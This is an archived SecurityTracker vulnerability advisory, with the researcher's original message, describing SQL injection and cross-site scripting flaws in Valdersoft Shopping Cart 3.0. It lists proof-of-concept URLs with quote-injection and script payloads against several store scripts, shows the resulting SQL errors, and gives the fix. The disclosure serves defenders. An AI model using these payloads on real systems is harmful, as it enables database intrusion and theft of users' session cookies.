SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   Valdersoft Shopping Cart Vendors:   Valdersoft
Valdersoft Shopping Cart Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013565
SecurityTracker URL:  http://securitytracker.com/id/1013565
CVE Reference:   CVE-2005-0907, CVE-2005-0908   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Mar 27 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0
Description:   Diabolic Crab reported some vulnerabilities in the Valdersoft Shopping Cart software. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

The 'category.php', 'item.php', 'index.php', and 'search_result.php' scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/item.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132〈='SQL_INJECTION

http://[target]/store/search_result.php?sid=&searchTopCategoryID=&searchQuery=
'SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD

http://[target]/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2
AD08522DF1CF9B46475132&currency=USD

Some scripts do not filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Valdersoft Shopping Cart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency
=USD

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Valdersoft Shopping Cart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has issued a fixed copy of version 3.0 as of March 30, 2005. Users of versions downloaded prior to that date should download a new copy.

[Editor's note: The fixed version has the same version number as the vulnerable version.]

Vendor URL:  www.valdersoft.com/valdersoft_shopping_cart.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple sql injection, and xss vulnerabilities in Vladersoft Shopping Cart v.3.0


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
 
Severity:  High
Title: Multiple sql injection, and xss vulnerabilities in Vladersoft
Shopping Cart v.3.0
Date: March  27,  2005
 
Summary:
There are multiple sql injection, xss vulnerabilities in the
Vladersoft Shopping Cart v.3.0.
 
Proof of Concept Exploits:
http://localhost/store/category.php?sid=CDFE279AC2AD08522DF1CF9B464751
32&id='SQL_INJECTION
 
Query: "SELECT * FROM categories WHERE CategoryID = ''SQL_INJECTION'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION'' at line 1
 

http://localhost/store/item.php?sid=CDFE279AC2AD08522DF1CF9B46475132&i
d='SQL_INJECTION
 
Query: "SELECT * FROM options WHERE OptionItemID = ''SQL_INJECTION'
ORDER BY OptionPrice ASC"
 
Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION'
ORDER BY OptionPrice ASC' at line 1
 

http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang='SQL_INJECTION
 
Query: "SELECT CategoryID AS bookmarkID, CategoryName'SQL_INJECTION
AS bookmarkName FROM categories WHERE CategoryID = '0'"
 
Error 1064: You have an error in your SQL syntax near '0'' at line 1
 

http://localhost/store/search_result.php?sid=&searchTopCategoryID=&sea
rchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=
USD
 
Query: "SELECT COUNT(*) FROM items AS I, categories AS C,
categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =
 
C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE
'%'SQL_INJECTION%'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION%'' at line 8
 

http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2
AD08522DF1CF9B46475132&currency=USD
 
Query: "SELECT COUNT(*) FROM items AS I, categories AS C,
categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =
 
C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE '%%'
AND CI.CategoryID = ''SQL_INJECTION'"
 
Error 1064: You have an error in your SQL syntax near
'SQL_INJECTION'' at line 8
 

http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&
lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Pops cookie
 
http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B4
6475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency
=USD
 
Pops cookie
 
Possible fix: The usage of htmlspeacialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing
 
user input to the mysql database, or before echoing data on the
screen, would solve these problems.
 
Author:
These vulnerabilties have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to
 
contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Lookout for my
 
soon to come out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
 
iQA/AwUBQkW2cSZV5e8av/DUEQIUIACffDh1klYSnd341ufoxoc/CzzN7dAAoNM1
8uH3AXjs6wo8uufYacolkSTZ
=dA+E
-----END PGP SIGNATURE-----
 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC